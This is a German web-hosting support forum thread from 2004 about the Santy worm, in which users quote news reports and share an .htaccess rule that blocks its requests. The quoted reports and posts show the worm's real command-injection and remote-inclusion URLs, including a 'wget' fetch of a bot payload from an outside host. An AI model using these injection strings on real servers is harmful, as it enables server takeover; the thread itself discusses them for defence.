Site gehackt

Begonnen von DeepThought, 21 Dezember 2004, 13:08:23

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

jubilee

Hallo !
ZitatTrace die IP: 66.249.66.161 crawl-66-249-66-161.googlebot.com
das bedeutet, das einCrawler von Google Deine Seite durchsucht und indiziert hat.
Somit ist die gefährdete Datei viewtopic.php auch Deines phpBB über google zu finden !
Und genauso geht der Wurm vor. Er sucht über google nach der viewtopic.php des phpBB-Forums.
Also, dann mach mal schnell ein update oder spiel zumindest den Hotfix ein, sonst sind Deine Seiten in kürze auch überschrieben ....
MfG
jubilee

munzur


Zitat
Also, dann mach mal schnell ein update oder spiel zumindest den Hotfix ein, sonst sind Deine Seiten in kürze auch überschrieben ....

Wie gesagt da die Seite noch nicht fertig und Online ist, ist es zum Teil egal wenn dies passiert. Mach aber in den nächsten Tagen das Update.

L.g
"Debug-Mode" einschalten.
"SQL-Fehler anzeigen" einschalten
und evt. auftauchende Fehlermeldungen posten .

Homicide

Munzur
deine Seite mit dem phpbb ist zwar noch nicht online, aber das teil liegt nunmal schon auf einem Server und wurde von Google indexiert.
Denkst du auch mal daran das auf dem Server noch andere Seiten liegen könnten welche schon online sind?
über dein Board kann der wurm dann auch auf die anderen Sites zugreifen.

Ich denke das Beispiel von DeepThought hat allen hier deutlich gezeigt wie schnell es gehen kann!

munzur

#43
@ Homi


Danke das du dich um mich bzw. um die anderen User auf dem Server sorgst aber hab nen Rootserver *bussi*


L.g


PS: Warum schon wieder 2 Minuspunkte? Ich hasse diese beurteilungen! Wenns möglich ist will ich mich da ausschliesen. Bleib liebend gern auf 0!

@jogi24 ich kreig wegen diesem post von dir ein Minus!?? Warum denn das? Jetzt sinds schon -7  DANKE
"Debug-Mode" einschalten.
"SQL-Fehler anzeigen" einschalten
und evt. auftauchende Fehlermeldungen posten .

onkel


Zitatich kreig wegen diesem post von dir ein Minus!?? Warum denn das? Jetzt sinds schon -7  DANKE

Schau mal bei mir .....jetzt sind es -20 .....aber gleich sind es -30 :)



mfg
Onkel

jubilee


ZitatWarum schon wieder 2 Minuspunkte? Ich hasse diese beurteilungen! Wenns möglich ist will ich mich da ausschliesen. Bleib liebend gern auf 0!
Schau mal bei mir .....jetzt sind es -20 .....aber gleich sind es -30


Schon gut. Ihr bekommst beide ein tröstungs-PLONK von mir ( aber erst am 24. 12 aufmachen ;) )



MfG
jubilee

AFP

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.

heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.

Quelle:Heise


Hallo,
Ist da schon was bekannt drüber???

jubilee

#47
Hallo !
ZitatIst da schon was bekannt drüber???
ZitatOffenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
Ja, klassisches Beispiel von XSS / Command-Injection.
Dieser Art Schwachstellen sind schon lange bekannt.
Machen kannst Du da wenig dagegen, ausser sauber gecodete Scripte zu verwenden.
Ausserdem schiesst dieser "Wurm" ja sozusagem mit "Kanonen auf Spatzen". Die Wahrscheinlichkeit, ein Script zu finden das die
nach aussen offenen Variablen direkt an die Shell gibt (mit exec(), system(), passthru() etc...) ist m.M. nach doch mehr als gering.
Das ist Voraussetzung um nach /tmp zu changen und dann den spybot.txt downzuloaden und zu speichern.
Ich denke es geht wieder um eine spezifische lücke die der Autor kennt, damit diese nicht bekannt wird,
greift er generell jedes Script so an. So sind Gegenmaßnahmen nicht so schnell zu finden, wenn man nicht weiss auf welches Script der Angriff zielt ...
MfG
jubilee

Andi

#48
Moin :)

so wie es in der who-Online Liste auf pragmamx.de aussieht, versucht der Wurm über mehrere uralte Sicherheitslücken in phpNuke anzugreifen.
Das funktioniert aber nicht in neueren Nuke-Versionen und schon garnicht im vkpMx.

Trotzdem wird dadurch unheimlich viel Traffic verursacht, weil bei jedem Aufruf der Schad-Url die vollständige "Modul ist nicht aktiv" Meldung angezeigt wird.

Im Coppermine-Forum habe ich folgenden Supertip gefunden:
http://coppermine.sourceforge.net/board/index.php?topic=12838.0

ZitatVersions of the worm will deface any site it can find on a server. If someone else on your server has a vulnerable version of phpBB, and other countermeasures are not implemented by your server host, your site will be defaced through no fault of your own.

A newer version of the worm will install an IRC controlled DDOS bot instead (or as well as, I'm not sure yet) of defacing sites.

The worm will try any and every php file it can find even though they are not necessarily phpBB. This will push your bandwidth usage through the roof. To guard against that, you can either edit each and every PHP file to just abort when it gets queried by the worm (easier siad than done) or if your host has mod_rewrite (most apache installations do), put the fllowing into a .htaccess file :-

        RewriteEngine On

        RewriteCond  %{QUERY_STRING} &cmd=cd%20/tmp;
        RewriteRule  .* - [F,L]

This will block the three variants that I am aware of. I will update this if needed as time progresses.

Although this worm only affects phpBB, I would not consider php 4.3.8 'safe'. Hosts need to patch the problems in earlier versions or upgrade to 4.3.10


Also eine .htaccess Datei mit dem entsprechenden Inhalt anlegen, oder die 2 Zeilen an die bereits bestehende .htaccess Datei anfügen.

        RewriteEngine On

        RewriteCond  %{QUERY_STRING} &cmd=cd%20/tmp;
        RewriteRule  .* - [F,L]


Die Zeilen bewirken, dass wenn die Schad-Url aufgerufen wird, bzw. wenn der String &cmd=cd /tmp; in der URL vorkommt, eine 403er "Zugriff verweigert" Meldung generiert wird und nicht die ganze Seite aufgebaut wird.


Beispiel:
http://www.pragmamx.de/modules.php?name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp....
schön´s Grüssle, Andi

Biker

Hi Andi, ;)

Welche 2 Zeilen denn...ich sehe 3 Zeilen....!?
ZitatRewriteEngine On

RewriteCond  %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule  .* - [F,L]
Muss ich das "Mod-Service aktiv?" dann auf ON haben?

Oder hat das modrewrite damit nichts zu tun?

Wenn ja, welche Einstellungen muss ich hier machen: mod_rewrite Unterstützung aktivieren?

LG
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

Andi

#50
Hi Bernd  8)

ZitatWelche 2 Zeilen denn...ich sehe 3 Zeilen....!?
es sind 3 Zeilen, wenn noch keine .htaccess Datei existiert, bzw. wenn in einer evtl. bestehenden, das mod_rewrite nicht aktiviert ist. Also, wenn diese Zeile fehlt: RewriteEngine On

Im vkpMx 2.1 pro ist ja bereits eine .htaccess Datei dabei, wo diese Zeile drin steht. Vorausgesetzt, die Datei wurde umbenannt (und damit aktiviert)

ZitatMuss ich das "Mod-Service aktiv?" dann auf ON haben?
Egal, das alles spielt sich nur innerhalb des Apachen ab und hat mit den Einstellungen im vkpMx nichts zu tun.

ZitatOder hat das modrewrite damit nichts zu tun?
Doch schon, die Zeilen sind nur 2 zusätzliche Regeln für das mod_rewrite.

Als Beispiel, die ersten Zeilen meiner .htaccess von http://vkp.shiba.de
# rename this file to .htaccess, and you will get nice and clean urls.

<IfModule mod_rewrite.c>
Options +FollowSymLinks

RewriteEngine on
# Depends on your configuration, you must set RewrteBase to
# switch on Mod_rewrite. See for this the online docs:
# http://httpd.apache.org/docs/mod/mod_rewrite.html
#

RewriteBase /

# [NeverEverNoSanity WebWorm] Fix
RewriteCond  %{QUERY_STRING} &cmd=cd%20/tmp;
RewriteRule  .* - [F,L]

# individuelle Rewrite-Regeln:

RewriteRule ^home\.htm(l?) index.php [L]
RewriteRule ^backend\.htm(l?)|rss\.xml backend.php [L]
# Your_Account Modul:
## undsoweiterundsofort.......


PS...
Das Ding funzt wirklich. Hatten wir den ganzen Tag über, auf pragmamx.de ständig bis zu 10 Wurm-Aufrufe in der Onlineliste, so sind es jetzt nur noch NULL, keine, weg sind se.... ;)
schön´s Grüssle, Andi

Liu-Kang

Also braucht man hierbei mit dem vkpMX 2.1 keine Angst haben, oder?
Und wenn ja, wie richte ich diese .htaccsess Datei ein?

jubilee

Hallo !
ZitatAlso braucht man hierbei mit dem vkpMX 2.1 keine Angst haben, oder?
Und wenn ja, wie richte ich diese .htaccsess Datei ein?
Nein, Gefahr besteht beim vkpmx 2.1 nicht.

MfG
jubilee

Biker

Wie sieht es denn mit der Sicherheit des SMF aus???
Ich meine als Stand-Alone oder auch im Mx integriert!?
Habe nämlich vor, von eBoard auf SMF umzustellen!

Gruß
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

Andi

Moin :)

ZitatWie sieht es denn mit der Sicherheit des SMF aus???
Denke dass das SMF eines der sichersten Boards sein wird. Geschwindigkeit und Sicherheit sind die beiden Hauptprioritäten des Entwicklerteams (höhöhö, wie bei uns...).
Bei Problemen wird vom Team sehr schnell reagiert, siehe hier:
http://www.simplemachines.org/community/index.php?topic=22008.0
http://www.simplemachines.org/community/index.php?topic=21787.0

Zitatoder auch im Mx integriert!?
Die mx-Version, wenn es die irgendwann geben wird, wird sich vom Original nur sehr wenig unterscheiden, damit die Fixe und Updates schnellstmöglich und ohne grossen Aufwand eingearbeitet werden können.
Wie bereits beim Coppermine-Port....
schön´s Grüssle, Andi

Biker

Hi Andy,....ich komm bei denen irgendwie nicht rein...Passwort hab ich angefordert, aber kömmt nix....könntest Du mir bitte den SMF-Patch per Mail zusenden?
admin@biker-unity.de

Danke! ;)
Detektei Martin - wir bringen Licht ins Dunkle!

Biker

Hat sich erledigt...habe dann doch schon nach 3 Stunden die Zugangsdaten per Email bekommen! *lol*
...naja, ist ja auch ein langer Weg bis nach Germany...*ggg*


Gruß
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

digimoments

ZitatPHP im Visier: Santy-Wurm weitet seinen Angriff aus

   PHP im Visier: Santy-Wurm weitet seinen Angriff aus



Der in der vergegangenen Woche aufgetauchte Santy-Wurm hat seine Angriffsstrategie geändert. Die erste Variante hatte es auf Web-Seiten abgesehen, bei denen das Forensystem phpBB zum Einsatz kommt. Um diese Seiten ausfindig zu machen, nutzte der Wurm die Suchmaschine Google. Google konnte seinerzeit die Ausbreitung des Wurms schnell stoppen.



Binnen weniger Tage sind jetzt allerdings gleich mehrere Weiterentwicklungen des Wurms Santy aufgetaucht. Santy.C und Santy.E attackieren nicht mehr nur Internet-Seiten mit phpBB, sondern generell Seiten, die in der Script-Sprache PHP programmiert wurden. Um es genauer zu sagen: Der Wurm hat es auf schlecht in PHP programmierte Seiten abgesehen.



Über Google, Yahoo und AOL versucht der Wurm zunächst Seiten zu ermitteln, die in PHP geschrieben wurden und in denen die Funktionen \\\"include()\\\" und \\\"require()\\\" vorkommen. Diese Funktionen werden dazu genutzt, um den Inhalt von Dateien auf einer Website anzuzeigen. Wenn der Programmierer die an diese Funktion übergebenen Parameter im Code nicht sorgfältig genug überprüft, kann ein Angreifer diese Funktion mißbrauchen und im Extremfall die gesamte Kontrolle über den Webserver übernehmen.



Die französischen Sicherheitsexperten von K-OTik Security empfehlen, PHP-Seiten, in denen die beiden genannten Funktionen vorkommen, so umzuprogrammieren, dass die beiden Funktionen auf eine sichere Art und Weise verwendet werden.

Ouelle: http://www.pcwelt.de/news/sicherheit/106195/

Und wie ist nun das Risiko für unser VKP?
Und wie hoch ist das Risiko wenn die Seite auf einem vServer liegen?

jubilee

Hallo !
ZitatUnd wie ist nun das Risiko für unser VKP?
Was ist denn "euer VKP" ?
Wenn Ihr das mx2.1/2.1.a verwendet, dann braucht Ihreuch da keinen Kopf drum machen.
ZitatUnd wie hoch ist das Risiko wenn die Seite auf einem vServer liegen?
Eine Gefahr geht auch von anderen Accounts/Webspaces aus, die auf dem gleichen Server liegen und 
angreifbar sind (weil sie das phpBB verwenden oder unsichere Scripte etc ....).  Über diesen Weg könnten, bei ungünstigerer Konfiguration, auch Seiten gehackt werden die von sich aus nicht angreifbar gewesen wären.
Daher nach Möglichkeit keine Dateien und Verzeichnisse  world-writeable (chmod 666 / 777) setzen sondern
höchstens chmod 755 (Verzeichnisse) oder 655 (Dateien)
MfG
jubilee

Andi

Moin :)

ZitatDie französischen Sicherheitsexperten von K-OTik Security empfehlen, PHP-Seiten, in denen die beiden genannten Funktionen vorkommen, so umzuprogrammieren, dass die beiden Funktionen auf eine sichere Art und Weise verwendet werden.

Sorry, aber dieser Schwachfugtip könnte direkt aus der Computerbild entnommen sein.
Dieser Supertip gehört zu den primitivsten Grundregeln der php-Programmierung, da braucht man keine französischen Sicherheitsexperten.
Leider muss man aber eingestehen, dass gerade diese Regel in der Vergangenheit, bei versch. Nuke-Modulen nicht eingehalten wurde. Das ist der altbekannte myEgallery und (nuke) Coppermine Bug....

Also, nochmal:

Solange ihr keine, in diesem Sinne, unsicheren Module im vkpMx verwendet, seid ihr sicher.

Der Rest, siehe Post von Jubilee...
schön´s Grüssle, Andi